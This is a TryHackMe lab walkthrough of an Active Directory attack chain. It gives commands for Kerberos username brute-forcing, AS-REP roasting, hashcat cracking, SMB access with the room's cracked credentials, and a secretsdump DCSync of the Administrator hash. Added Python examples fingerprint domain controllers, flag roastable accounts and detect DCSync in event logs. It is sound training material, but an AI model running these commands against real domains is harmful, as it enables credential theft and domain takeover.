TryHackMe: Attacktive Directory Walkthrough


Link: https://tryhackme.com/room/attacktivedirectory

This is a free machine from THM that covers Active Directory. The room also gives you good hands-on practice with the Impacket toolkit. Let’s begin.

First, let’s scan this target using nmap.

nmap -sC -sV <IP>

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-10-18 04:24:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-10-18T04:24:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-10-17T04:06:58
|_Not valid after:  2022-04-18T04:06:58
|_ssl-date: 2021-10-18T04:24:28+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-10-18T04:24:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.92 seconds

 

As we can see, a plethora of ports are open, including Kerberos. Let’s use kerbrute to brute-force user names against Kerberos. Before running it, make sure you have added the target IP to /etc/hosts with the domain spookysec.local. The user list and password list are already shared by the room’s creator.
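The combination of ports in the scan above (DNS, Kerberos, LDAP, kpasswd, SMB and the Global Catalog on 3268) is the classic fingerprint of a domain controller, and the rdp-ntlm-info script gives the clean domain name that the LDAP banner prints with a stray "0." suffix. The following Python is an added example, not part of the walkthrough, that parses nmap's normal output format into a port table, applies that fingerprint, and recovers the domain name from either source. The sample output is a constructed, trimmed version of the scan above.

```python
import re

# Constructed sample in nmap's normal output format, modelled on the scan of
# the domain controller above (trimmed and re-spaced; not the verbatim output).
SAMPLE_NMAP = """\
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-10-18 04:24:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   NetBIOS_Domain_Name: THM-AD
|   DNS_Domain_Name: spookysec.local
|_  DNS_Computer_Name: AttacktiveDirectory.spookysec.local
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
NTLM_RE = re.compile(
    r"^\|_?\s+(NetBIOS_Domain_Name|DNS_Domain_Name|DNS_Computer_Name):\s*(\S+)"
)
# The LDAP banner ends "Domain: spookysec.local0., Site: ..."; the lazy match
# plus optional "0" strips that suffix.
LDAP_DOMAIN_RE = re.compile(r"Domain:\s*(\S+?)0?\.,")

# Services that, taken together, fingerprint a domain controller:
# DNS, Kerberos, LDAP, SMB, kpasswd and the Global Catalog.
DC_PORTS = {53, 88, 389, 445, 464, 3268}


def parse_nmap(text):
    """Return ({port: {state, service, version}}, {rdp-ntlm-info field: value})."""
    ports, ntlm = {}, {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = {
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5) or "",
            }
            continue
        m = NTLM_RE.match(line)
        if m:
            ntlm[m.group(1)] = m.group(2)
    return ports, ntlm


def is_domain_controller(ports):
    """True when every DC-fingerprint port is open."""
    open_ports = {p for p, info in ports.items() if info["state"] == "open"}
    return DC_PORTS <= open_ports


def domain_name(ports, ntlm):
    """Prefer the DNS domain from rdp-ntlm-info, else strip it out of the LDAP banner."""
    if "DNS_Domain_Name" in ntlm:
        return ntlm["DNS_Domain_Name"]
    for info in ports.values():
        if info["service"] == "ldap":
            m = LDAP_DOMAIN_RE.search(info["version"])
            if m:
                return m.group(1)
    return None


if __name__ == "__main__":
    ports, ntlm = parse_nmap(SAMPLE_NMAP)
    print("domain controller:", is_domain_controller(ports))
    print("domain:", domain_name(ports, ntlm))
```

The domain name is what goes into /etc/hosts before the Kerberos steps, and the fingerprint is the same signal a defender uses to decide which hosts deserve DC-grade monitoring.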

 

To get the AS-REP roastable accounts from the Key Distribution Centre, we will use GetNPUsers.py from Impacket.

python3 GetNPUsers.py -dc-ip spookysec.local spookysec.local/ -usersfile ~/THM/Attacktivedirec/user.txt -no-pass

Copy this hash and use hashcat to crack it (mode 18200 is Kerberos 5 AS-REP, etype 23).

hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force
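What GetNPUsers.py finds are accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set: the KDC then hands out AS-REP material encrypted with the account's password-derived key without any proof of the password, which is what hashcat mode 18200 attacks. The Python below is an added example, not from the room or Impacket, that (a) picks out such accounts from a constructed set of user objects, the same check an administrator runs to find and fix exposure, and (b) parses the $krb5asrep$23$ line format the tool prints so the pieces hashcat works on are visible. The sample users and the hash line are constructed with placeholder bytes.

```python
import re

# userAccountControl flags (values from the AD schema).
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

# Constructed sample of user objects (sAMAccountName -> userAccountControl),
# shaped like what an LDAP query or Get-ADUser returns. Not from the room.
SAMPLE_USERS = {
    "Administrator": 0x200,                                 # NORMAL_ACCOUNT only
    "svc-helpdesk": 0x200 | DONT_REQ_PREAUTH,               # roastable
    "old-svc": 0x200 | DONT_REQ_PREAUTH | ACCOUNTDISABLE,   # disabled: KDC refuses
    "backup": 0x200,
}


def asrep_roastable(users):
    """Enabled accounts with pre-authentication disabled: the set a tool such as
    GetNPUsers.py can obtain AS-REP material for, and the set to remediate."""
    return sorted(
        name for name, uac in users.items()
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE
    )


# hashcat mode 18200 = Kerberos 5 AS-REP, etype 23 (RC4-HMAC). The line format is
# $krb5asrep$23$<user>@<REALM>:<16-byte checksum hex>$<enc-part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line):
    """Split an AS-REP hash line into its fields; raise ValueError if malformed."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$<etype>$ line")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["enc_part_bytes"] = len(d["enc"]) // 2   # ciphertext length in bytes
    return d


# Constructed hash line with placeholder hex bytes (not a real ticket).
SAMPLE_HASH = (
    "$krb5asrep$23$svc-helpdesk@SPOOKYSEC.LOCAL:" + "ab" * 16 + "$" + "cd" * 40
)

if __name__ == "__main__":
    print("roastable:", asrep_roastable(SAMPLE_USERS))
    print(parse_asrep_hash(SAMPLE_HASH))
```

On a healthy domain asrep_roastable() should return an empty list unless a specific application needs the flag; those exceptions need long passwords, since the checksum and encrypted part are all an offline guess needs. On the DC, a 4768 event with Pre-Authentication Type 0 is the corresponding log trace of such a request.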

 

svc-admin : management2005. We will use these credentials to check the shares on the domain controller.

smbclient -L //<IP>/ -U 'svc-admin%management2005'

(smbclient takes the password after a % in the -U argument; -P is its port option, not a password flag.)

 

As we can see, there is a backup share which contains a base64-encoded backup credential.

 

As per the instructions of the creator:

“Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes. Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”

Let’s use secretsdump.py:

python3 secretsdump.py spookysec.local/backup:backup2517860@spookysec.local -just-dc-user Administrator

This output gives us the Administrator’s password hash. Now we can use it to get admin access over WinRM.
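The "unique permission" the creator describes is the pair of replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) that let secretsdump.py ask the DC for password data the way another DC would. On a DC with object-access auditing enabled, every such request produces a Security event 4662 whose Properties list those rights' GUIDs, so the detection is simple: a non-DC, non-sync account exercising them. The Python below is an added example, not from the room, that runs that rule over constructed, flattened 4662 records (real pipelines read the event XML/JSON; the allowlisted sync account name is hypothetical).

```python
import re

# Extended-right GUIDs that appear in event 4662 "Properties" when an
# account performs directory replication, which is what DCSync relies on.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate besides domain controllers (machine accounts,
# trailing "$"). The name here is hypothetical, e.g. a directory sync service.
ALLOWED_REPLICATORS = {"svc-adsync"}

# Constructed, flattened event 4662 records, one per line. Not real logs.
SAMPLE_EVENTS = """\
2021-10-18T04:30:01Z EventID=4662 SubjectUserName=ATTACKTIVEDIREC$ SubjectDomainName=THM-AD AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}
2021-10-18T04:31:15Z EventID=4662 SubjectUserName=backup SubjectDomainName=THM-AD AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}
2021-10-18T04:32:40Z EventID=4662 SubjectUserName=jsmith SubjectDomainName=THM-AD AccessMask=0x10 Properties={deadbeef-0000-4000-8000-000000000001}
2021-10-18T04:33:02Z EventID=4662 SubjectUserName=svc-adsync SubjectDomainName=THM-AD AccessMask=0x100 Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}
2021-10-18T04:34:11Z EventID=4624 SubjectUserName=backup SubjectDomainName=THM-AD LogonType=3
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line):
    """Turn one flattened record into a dict; collects every GUID on the line."""
    timestamp, rest = line.split(" ", 1)
    fields = dict(FIELD_RE.findall(rest))
    fields["timestamp"] = timestamp
    fields["guids"] = {g.lower() for g in GUID_RE.findall(rest)}
    return fields


def detect_dcsync(log_text, allowed=ALLOWED_REPLICATORS):
    """Alert on 4662 events where a non-DC, non-allowlisted account used a
    replication right. Returns a list of alert dicts (empty when clean)."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = ev["guids"] & set(REPLICATION_RIGHTS)
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        if user.endswith("$") or user in allowed:
            continue   # domain controller or sanctioned replicator
        alerts.append({
            "timestamp": ev["timestamp"],
            "user": user,
            "domain": ev.get("SubjectDomainName", ""),
            "rights": sorted(REPLICATION_RIGHTS[g] for g in rights),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print("possible DCSync:", alert)
```

The same GUIDs are what to look for when auditing the domain's ACL: any principal other than the DCs and the sync account holding them is the misconfiguration that made the backup account so valuable in this room.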

Root!!

Happy Hacking.
